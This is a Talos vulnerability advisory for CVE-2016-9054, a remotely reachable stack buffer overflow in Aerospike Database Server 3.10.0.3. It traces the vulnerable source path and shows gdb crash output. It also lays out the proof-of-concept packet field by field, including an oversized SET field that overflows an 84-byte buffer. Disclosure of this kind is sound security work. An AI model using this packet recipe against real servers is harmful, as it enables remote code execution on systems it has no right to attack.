Talos Vulnerability Report

TALOS-2016-0268

Aerospike Database Server Set Name Code Execution Vulnerability

January 9, 2017
CVE Number

CVE-2016-9054

Summary

An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function as_sindex__simatch_list_by_set_binid resulting in remote code execution. An attacker can simply connect to the port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

Details

Aerospike Database Server is both a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in ram with the ability to persist data to a solid-state drive or traditional rotational media.

When processing a packet from the client, the server will execute the thr_demarshal function. After accepting a connection on the socket, the server will read the header from the packet and check it’s protocol type. If its protocol type specifies that the packet is compressed (PROTO_TYPE_AS_MSG_COMPRESSED), it will decompress it with zlib and then continue to process the packet [1]. Later, when the protocol type is PROTO_TYPE_AS_MSG the server will pass the packet to the thr_tsvc_process_or_enqueue function [2].

as/src/base/thr_demarshal.c:389
void *
thr_demarshal(void *unused)
{
...
    // Demarshal transactions from the socket.
...
        // Iterate over all events.
        for (i = 0; i < nevents; i++) {
...
                // If pointer is NULL, then we need to create a transaction and
                // store it in the buffer.
                if (fd_h->proto == NULL) {
...
                    // Do a preliminary read of the header into a stack-
                    // allocated structure, so that later on we can allocate the
                    // entire message buffer.
                    if (0 >= (n = cf_socket_recv(sock, &proto, sizeof(as_proto), MSG_WAITALL))) {
                        cf_detail(AS_DEMARSHAL, "proto socket: read header fail: error: rv %d sz was %d errno %d", n, sz, errno);
                        goto NextEvent_FD_Cleanup;
                    }
...
                // Check for a finished read.
                if (0 == fd_h->proto_unread) {
...
                    // Check if it's compressed.
                    if (tr.msgp->proto.type == PROTO_TYPE_AS_MSG_COMPRESSED) {      // [1]
...
                    }
...
                    // Either process the transaction directly in this thread,
                    // or queue it for processing by another thread (tsvc/info).
                    if (0 != thr_tsvc_process_or_enqueue(&tr)) {                    // [2]
                        cf_warning(AS_DEMARSHAL, "Failed to queue transaction to the service thread");
                        goto NextEvent_FD_Cleanup;
                    }

The thr_tsvc_process_or_enqueue function will first read the namespace from the packet then and check to see the data is configured to be stored in memory by calling the as_msg_peek_data_in_memory function [1]. If the namespace is undefined or configured to not be stored in memory, the function will continue by calling into process_transaction [2]. In order to trigger this particular vulnerability, this is the path that must be taken.

as/src/base/thr_tsvc.c:497
int
thr_tsvc_process_or_enqueue(as_transaction *tr)
{
    // If transaction is for data-in-memory namespace, process in this thread.
    if (g_config.allow_inline_transactions &&
            g_config.n_namespaces_in_memory != 0 &&
                    (g_config.n_namespaces_not_in_memory == 0 ||
                            as_msg_peek_data_in_memory(&tr->msgp->msg))) {  // [1]
        process_transaction(tr);                                            // [2]
        return 0;
    }
...

Inside the process_transaction function, the server will use the string defined by the AS_MSG_FIELD_TYPE_NAMESPACE field to determine the namespace. Once the namespace is discovered, the server will determine what type of transaction request is being made. This is done by checking which fields are defined. After determining the transaction is a multi-record type by checking that the AS_MSG_FIELD_BIT_KEY and AS_MSG_FIELD_BIT_DIGEST_RIPE fields are not included [1], the transaction will be checked to see if it’s a batched transaction. This is done by checking to see if the AS_MSG_FIELD_BIT_DIGEST_RIPE_ARRAY is included [2]. Finally after checking for those fields, the function will call as_transaction_is_query [3]. The as_transaction_is_query function will then check for the AS_MSG_FIELD_BIT_INDEX_RANGE field being set and if so will pass execution to the as_query function at [4].

as/src/base/thr_tsvc.c:71
void
process_transaction(as_transaction *tr)
{
...
    // All transactions must have a namespace.
    as_msg_field *nf = as_msg_field_get(m, AS_MSG_FIELD_TYPE_NAMESPACE);
...
    as_namespace *ns = as_namespace_get_bymsgfield(nf);
...
    if (as_transaction_is_multi_record(tr)) {           // [1] \
...
        if (as_transaction_is_batch_direct(tr)) {       // [2] \
...
        }
        else if (as_transaction_is_query(tr)) {         // [3] \
            // Query.
...
            if (as_query(tr, ns) != 0) {                // [4]
...


\ [1]
as/include/base/transaction.h:265
static inline bool
as_transaction_is_multi_record(const as_transaction *tr)
{
    return	(tr->msg_fields & (AS_MSG_FIELD_BIT_KEY | AS_MSG_FIELD_BIT_DIGEST_RIPE)) == 0 &&
            (tr->from_flags & FROM_FLAG_BATCH_SUB) == 0;
}

\ [2]
as/include/base/transaction.h:272
static inline bool
as_transaction_is_batch_direct(const as_transaction *tr)
{
    // Assumes we're already multi-record.
    return (tr->msg_fields & AS_MSG_FIELD_BIT_DIGEST_RIPE_ARRAY) != 0;
}

\ [3]
as/include/base/transaction.h:265
static inline bool
as_transaction_is_query(const as_transaction *tr)
{
    // Assumes we're already multi-record.
    return (tr->msg_fields & AS_MSG_FIELD_BIT_INDEX_RANGE) != 0;
}

At the beginning of the as_query function, the application will hand-off the transaction to the query_setup function [1]. Inside this function, the server will ensure that the requested namespace has a secondary index associated with it by calling the as_sindex_ns_has_sindex [2]. After this is determined, the metadata for the index will be fetched from the packet at [3]. After all is said and done, the server will read a string out of the AS_MSG_FIELD_TYPE_SET field. This will get saved to the setname variable and then passed as an argument to [4].

as/src/base/thr_query.c:2856
int
as_query(as_transaction *tr, as_namespace *ns)
{
    if (tr) {
        QUERY_HIST_INSERT_DATA_POINT(query_txn_q_wait_hist, tr->start_time);
    }

    as_query_transaction *qtr;
    int rv = query_setup(tr, ns, &qtr);                                         // [1] \
...
\
as/src/base/thr_query.c:2686
static int
query_setup(as_transaction *tr, as_namespace *ns, as_query_transaction **qtrp)
{
...
    bool has_sindex   = as_sindex_ns_has_sindex(ns);                            // [2]
...
    int ret = as_sindex_rangep_from_msg(ns, &tr->msgp->msg, &srange);
...
    ASD_SINDEX_MSGRANGE_FINISHED(nodeid, trid);
    // get optional set
    as_msg_field *sfp = as_transaction_has_set(tr) ?
            as_msg_field_get(&tr->msgp->msg, AS_MSG_FIELD_TYPE_SET) : NULL;     // [3]
    if (sfp && as_msg_field_get_value_sz(sfp) > 0) {
        setname = cf_strndup((const char *)sfp->data, as_msg_field_get_value_sz(sfp));
    }
...
    } else {
        // Look up sindex by bin in the query in case not
        // specified in query
        si = as_sindex_from_range(ns, setname, srange);                         // [4]
    }

Inside the as_sindex_from_range function, the string from the packet will be passed through the as_sindex_lookup_by_defns function which is a wrapper around as_sindex__lookup_lockfree. Later in that function, the string will be handed off to as_sindex__simatch_by_set_binid. This is the function that contains our specific vulnerability.

as/src/base/secondary_index.c:2520
as_sindex *
as_sindex_from_range(as_namespace *ns, char *set, as_sindex_range *srange)
{
...
    as_sindex *si = as_sindex_lookup_by_defns(ns, set, srange->start.id,            // [1] \\
                        as_sindex_sktype_from_pktype(srange->start.type), srange->itype, srange->bin_path,
                        AS_SINDEX_LOOKUP_FLAG_ISACTIVE);
\\
as_sindex *
as_sindex__lookup_lockfree(as_namespace *ns, char *iname, char *set, int binid,
                                as_sindex_ktype type, as_sindex_type itype, char * path, char flag)
{
...
	simatch   = as_sindex__simatch_by_set_binid(ns, set, binid, type, itype, path); // [2]
...

Finally the string will be passed into as_sindex__simatch_list_by_set_binid [1] and then used as an argument to sprintf [2]. If the length of the string plus the id for the bin is larger than AS_SINDEX_PROP_KEY_SIZE (84), then this vulnerability is being triggered.

as/src/base/secondary_index.c:122
#define AS_SINDEX_PROP_KEY_SIZE (AS_SET_NAME_MAX_SIZE + 20) // setname_binid_typeid

as/include/base/datamodel.h:1141
#define AS_SET_NAME_MAX_SIZE	64		// includes space for null-terminator

as/src/base/secondary_index.c:849
int
as_sindex__simatch_by_set_binid(as_namespace *ns, char * set, int binid, as_sindex_ktype type, as_sindex_type itype, char * path)
{
...
    cf_ll * simatch_ll = NULL;
    as_sindex__simatch_list_by_set_binid(ns, set, binid, &simatch_ll);      // [1]
...
\
as/src/base/secondary_index.c:815
as_sindex_status
as_sindex__simatch_list_by_set_binid(as_namespace * ns, const char *set, int binid, cf_ll ** simatch_ll)
{
    // Make the fixed size key (set_binid)
    // Look for the key in set_binid_hash
    // If found return the value (list of simatches)
    // Else return NULL

    // Make the fixed size key (set_binid)
    char si_prop[AS_SINDEX_PROP_KEY_SIZE];
    memset(si_prop, 0, AS_SINDEX_PROP_KEY_SIZE);
    if (!set) {
        sprintf(si_prop, "_%d", binid);
    }
    else {
        sprintf(si_prop, "%s_%d", set, binid);                              // [2]
    }

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`
...

(gdb) b as_sindex__simatch_by_iname
Breakpoint 5 at 0x506331: file base/secondary_index.c, line 985.

(gdb) c
Continuing.
[Switching to Thread 0x7f8d0cf77700 (LWP 43832)]

Catchpoint 4 (signal SIGSEGV), 0x0000000000505b41 in as_sindex__simatch_list_by_set_binid (ns=0x4141414141414141,
    set=0x4141414141414141 <Address 0x4141414141414141 out of bounds>,
    binid=0x41414141, simatch_ll=0x4141414141414141)
    at base/secondary_index.c:834
834             int rv             = shash_get(ns->sindex_set_binid_hash, (void *)si_prop, (void *)simatch_ll);

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3000 $namespace $binid
Trying to connect to hostname:3000
Sending 0x232 byte packet... done.

A client packet for Aerospike server has the following structure. The first 2 bytes describe the protocol version and the protocol type. The version must be 0x02, where the protocol type can be one of two values. If AS_COMPRESSED_MSG(0x04) is specified, then the contents of data are zlib-encoded. Otherwise, the AS_MSG(0x03) value is used. The size of this data is defined by the sz field which is a 48-bit unsigned integer.

<class aspie.as_proto_s>
[0] <instance aspie.proto_version 'version'> v2(0x2)
[1] <instance aspie.proto_type 'type'> AS_MSG(0x3)
[2] <instance uint48_t 'sz'> +0x00000000022e (558)
[8] <instance aspie.as_msg_s 'data'> "\x00\x00\x00\x00\x00\x00\x00 ..skipped ~538 bytes.. \x42\x42\x42\x42\x42\x42\x42"

The contents of the data field has the following structure. In order to submit a message that passes the checks at as_transaction_is_multi_record and as_transaction_is_query, There simply needs to be a field with the NAMESPACE(0x0) id, one with an INDEX_RANGE(0x16) id, and no fields that use the BIT_KEY(2) or BIT_DIGEST_RIPE(4) identifiers. The field that is being used to overflow with is using the INDEX_NAME(0x15) id. This means that there must be at least three fields defined and thus the uint16_t field n_fields must be set to 0x0003 or more.

<class aspie.as_msg_s> 'data'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint32_t 'transaction_ttl'> +0x00000000 (0)
[1a] <instance uint16_t 'n_fields'> +0x0003 (3)
[1c] <instance uint16_t 'n_ops'> +0x0000 (0)
[1e] <instance array(aspie.as_msg_field_s,3) 'fields'> aspie.as_msg_field_s[3] "\x00\x00\x00\x09\x00\x58\x58 ..skipped ~516 bytes.. \x42\x42\x42\x42\x42\x42\x42"
[236] <instance array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""

Af offset 0x1e of the packet is the definition of fields. This is an array of fields that provide options for the type of request that is being made. The field identified by NAMESPACE(0x0) contains a namespace that supports the configuration defined above.

<class aspie.as_msg_field_s> '0'
[1e] <instance uint32_t 'field_sz'> +0xXXXXXXXX (X)
[22] <instance aspie.AS_MSG_FIELD_TYPE 'type'> NAMESPACE(0x0)
[23] <instance aspie.as_msg_namespace_s<char_t> 'data'> ...

One of the requirements is that an INDEX_RANGE(0x16) field must be defined. This begins at offset 0x2b of the packet generated by the proof-of-concept.

<class aspie.as_msg_field_s> '1'
[24] <instance be(pint.uint32_t) 'field_sz'> +0x0000001d (29)
[28] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> INDEX_RANGE(0x16)
[29] <instance aspie.as_msg_index_range_s 'data'> "\x01\x01\x62\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.as_msg_index_range_s> 'data'
[29] <instance be(pint.uint8_t) 'numrange'> +0x01 (1)
[2a] <instance dynamic.array(aspie.irange,1) 'range'> aspie.irange[1] "\x01\x62\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.irange> '0'
[2a] <instance be(pint.uint8_t) 'bin_path_len'> +0x01 (1)
[2b] <instance c(pstr.string<char_t>) 'bin_path'> u'b'
[2c] <instance aspie.particle 'particle'> "\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.particle> 'particle'
[2c] <instance be(aspie.AS_PARTICLE_TYPE) 'type'> INTEGER(0x1)
[2d] <instance be(pint.uint32_t) 'start_particle_size'> +0x00000008 (8)
[31] <instance dynamic.block(8) 'start_particle_data'> "\x00\x00\x00\x00\x00\x00\x00\x00"
[39] <instance be(pint.uint32_t) 'end_particle_size'> +0x00000008 (8)
[3d] <instance dynamic.block(8) 'end_particle_data'> "\x00\x00\x00\x00\x00\x00\x00\x00"

Another requirement is that an INDEX_TYPE(0x1a) field must be defined.

<class aspie.as_msg_field_s> '3'
[24a] <instance be(pint.uint32_t) 'field_sz'> +0x00000001 (1)
[24e] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> INDEX_TYPE(0x1a)
[24f] <instance c(be(aspie.as_msg_index_type_s)) 'data'> DEFAULT(0x0)

The last field that is used to overflow the 84 byte buffer has the identifier of SET(0x1). As long as the length defined in field_sz is larger than 84 (exclusive) and the contents of data contains the same number of bytes, this vulnerability is being triggered.

<class aspie.as_msg_field_s> '2'
[45] <instance be(pint.uint32_t) 'field_sz'> +0x00000201 (513)
[49] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> SET(0x1)
[4a] <instance c(c(ptype.block)) 'data'> "\x41\x41\x41\x41\x41\x41\x41 ..skipped ~492 bytes.. \x41\x41\x41\x41\x41\x41\x41"

Timeline

2016-12-23 - Vendor Disclosure
2017-01-09 - Public Release

Credit

Discovered by the Cisco Talos Team.